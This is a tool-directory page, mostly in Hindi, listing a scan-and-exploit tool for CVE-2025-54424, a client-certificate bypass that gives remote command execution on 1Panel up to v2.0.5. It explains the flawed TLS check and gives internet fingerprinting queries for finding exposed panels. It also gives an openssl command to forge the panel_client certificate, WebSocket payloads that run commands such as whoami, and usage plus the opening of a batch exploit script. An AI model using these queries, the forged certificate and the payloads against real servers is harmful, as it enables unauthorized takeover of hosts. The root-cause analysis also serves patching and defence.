Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-54424 — CVE-2025-54424: 1Panel क्लाइंट प्रमाणपत्र बाईपास RCE भेद्यता ऑल-इन-वन टूल (स्कैन + एक्सप्लॉइट) | Kitploit
उपकरण/GitHubGitHub/mr-xn/cve-2025-54424
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूलArchived
GitHubmr-xn/cve-2025-54424

CVE-2025-54424

CVE-2025-54424: 1Panel क्लाइंट प्रमाणपत्र बाईपास RCE भेद्यता ऑल-इन-वन टूल (स्कैन + एक्सप्लॉइट)

रिपॉजिटरी देखें
591161 साल पहलेअभी तक समीक्षित नहीं
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-54424

CVE-2025-54424: 1Panel क्लाइंट प्रमाणपत्र बायपास RCE भेद्यता एकीकृत उपकरण (स्कैन + एक्सप्लॉइट)

भेद्यता परिचय

1Panel एक ओपन-सोर्स, आधुनिक Linux संचालन और रखरखाव प्रबंधन पैनल है, जो वेबसाइट परिनियोजन, सर्वर प्रबंधन और सेवा संचालन के लिए ग्राफिकल इंटरफ़ेस प्रदान करता है।

प्रभावित संस्करणों में, Agent पक्ष की TLS प्रमाणीकरण नीति tls.RequireAnyClientCert है, जो केवल प्रमाणपत्र प्रस्तुत करने की आवश्यकता रखती है लेकिन उसकी विश्वसनीयता को सत्यापित नहीं करती। हमलावर स्व-हस्ताक्षरित प्रमाणपत्र के माध्यम से TLS सत्यापन को बायपास कर सकता है, और CN फ़ील्ड को panel_client के रूप में जाली बनाकर एप्लिकेशन-स्तरीय सत्यापन को बायपास कर सकता है। अंततः हमलावर जाली प्रमाणपत्र बनाकर अनधिकृत कमांड निष्पादन इंटरफ़ेस कॉल कर सकता है, जिससे रिमोट कमांड निष्पादन भेद्यता उत्पन्न होती है।

प्रभावित संस्करण

<= v2.0.5

फ़िंगरप्रिंटिंग सिंटैक्स

hunter और fofa फ़िंगरप्रिंटिंग क्वेरी निम्नलिखित हैं

cert.subject_org=="FIT2CLOUD"&&ip.port="9999” || cert.subject.suffix=="panel_server"

cert.subject.org="FIT2CLOUD" && port="9999" && protocol="tls" || cert.subject.cn="panel_server"

भेद्यता विश्लेषण

GitHub भेद्यता सूचना अनुभाग कॉपी करें

  • सबसे पहले 1panel v2 के Core पक्ष और Agent पक्ष की अवधारणा का परिचय दिया गया है। नया संस्करण जारी होने के बाद, 1panel ने नोड प्रबंधन सुविधा जोड़ी, जिससे नोड जोड़कर अन्य होस्टों को नियंत्रित किया जा सकता है।
  • Core पक्ष और Agent पक्ष के बीच संचार में उपयोग होने वाला HTTPS प्रोटोकॉल, प्रमाणपत्र सत्यापन के दौरान प्रमाणपत्र की प्रामाणिकता को पूर्ण रूप से सत्यापित नहीं करता, जिसके परिणामस्वरूप इंटरफ़ेस अनधिकृत हो जाता है। 1panel में बड़ी संख्या में कमांड निष्पादन या उच्च-विशेषाधिकार वाले इंटरफ़ेस मौजूद होने के कारण RCE उत्पन्न होती है।

कोड ऑडिट प्रक्रिया

  1. सबसे पहले हम Agent HTTP रूट फ़ाइल agent/init/router/router.go में प्रवेश करते हैं

  1. हम पाते हैं कि Routers फ़ंक्शन में Certificate फ़ंक्शन का संदर्भ देकर वैश्विक सत्यापन किया गया है agent/middleware/certificate.go

  1. हम पाते हैं कि Certificate फ़ंक्शन c.Request.TLS.HandshakeComplete के माध्यम से यह जाँचता है कि प्रमाणपत्र संचार हुआ है या नहीं

  1. चूँकि c.Request.TLS.HandshakeComplete की सत्य/असत्य जाँच agent/server/server.go कोड के Start फ़ंक्शन में tls.RequireAnyClientCert के माध्यम से की जाती है

नोट: यहाँ tls.RequireAndVerifyClientCert के बजाय tls.RequireAnyClientCert का उपयोग किया गया है। RequireAnyClientCert केवल यह आवश्यकता रखता है कि क्लाइंट प्रमाणपत्र प्रस्तुत करे, यह प्रमाणपत्र जारी करने वाले CA को सत्यापित नहीं करता, इसलिए कोई भी स्व-हस्ताक्षरित प्रमाणपत्र TLS हैंडशेक को पार कर सकता है।

  1. आगे Certificate फ़ंक्शन में अन्य जाँचों में केवल यह सत्यापित किया गया कि प्रमाणपत्र का CN फ़ील्ड panel_client है, प्रमाणपत्र जारीकर्ता को सत्यापित नहीं किया गया। अंत में पाया गया कि WebSocket कनेक्शन Proxy-ID सत्यापन को बायपास कर सकता है।

  1. परियोजना में बड़ी संख्या में WebSocket इंटरफ़ेस मौजूद हैं।
  • Process WebSocket इंटरफ़ेस (उपरोक्त समस्या के कारण सभी प्रक्रियाओं आदि की संवेदनशील जानकारी प्राप्त की जा सकती है) रूट पता: /process/ws अनुरोध प्रारूप निम्नलिखित है
{
  "type": "ps",           // 数据类型: ps(进程), ssh(SSH会话), net(网络连接), wget(下载进度)
  "pid": 123,             // 可选,指定进程ID进行筛选
  "name": "process_name", // 可选,根据进程名筛选
  "username": "user"      // 可选,根据用户名筛选
}

  • Terminal SSH WebSocket इंटरफ़ेस (उपरोक्त समस्या के कारण कोई भी कमांड निष्पादित की जा सकती है) रूट पता: /hosts/terminal अनुरोध प्रारूप निम्नलिखित है
{
  "type": "cmd",
  "data": "d2hvYW1pCg=="  // "whoami" 的base64编码,记住不要忘记回车。
}

  • Container Terminal WebSocket इंटरफ़ेस (कंटेनर में कमांड निष्पादन इंटरफ़ेस) रूट पता: /containers/terminal
  • File Download Process WebSocket इंटरफ़ेस (डाउनलोड प्रगति जानकारी स्वचालित रूप से पुश करता है) रूट पता: /files/wget/process

भेद्यता पुनरुत्पादन (PoC)

मैन्युअल पुनरुत्पादन

  1. प्रमाणपत्र जनरेट करें

openssl req -x509 -newkey rsa:2048 -keyout panel_client.key -out panel_client.crt -days 365 -nodes -subj "/CN=panel_client"

  1. burp में जनरेट किए गए panel_client.crt और panel_client.key को लोड करने के बाद, ws अनुरोध खोलें, लक्ष्य सेट करें और अनुरोध शुरू करें

बैच डिटेक्शन

मेरे द्वारा विकसित CVE-2025-54424.py स्क्रिप्ट का उपयोग करके बैच डिटेक्शन और एक्सप्लॉइट किया जा सकता है। उपकरण के उपयोग के निर्देश निम्नलिखित हैं

आवश्यक डिपेंडेंसी स्थापित करें pip install websocket-client cryptography PySocks requests

usage: CVE-2025-54424.py [-h] (-u URL | -f FILE) [-o OUTPUT] [-t THREADS]
                         [--proxy PROXY]

1Panel 客户端证书绕过RCE漏洞 一体化工具 (扫描+利用)
作者: Mrxn https://github.com/Mr-xn

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     单个目标,进入利用模式。例如: 192.168.1.100:8080
  -f FILE, --file FILE  目标文件,进入批量扫描模式。
  -o OUTPUT, --output OUTPUT
                        [扫描模式] 保存漏洞结果的文件名。
  -t THREADS, --threads THREADS
                        [扫描模式] 并发线程数。
  --proxy PROXY         为所有请求设置代理。例如: http://127.0.0.1:8080

उदाहरण के लिए, एकल लक्ष्य परीक्षण + कमांड निष्पादन (SSH इंटरैक्टिव कमांड निष्पादन) नीचे चित्र में दर्शाया गया है

import base64
import ssl
import sys
import json
import os
import tempfile
import argparse
import requests
import websocket
import threading
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urlparse
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
import datetime

# 禁用 requests 库在禁用SSL验证时产生的警告
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# --- 全局变量和线程锁 ---
print_lock = threading.Lock()
exploit_running = True
vulnerable_hosts = []

# --- 核心功能函数 ---
टूल डाउनलोड करें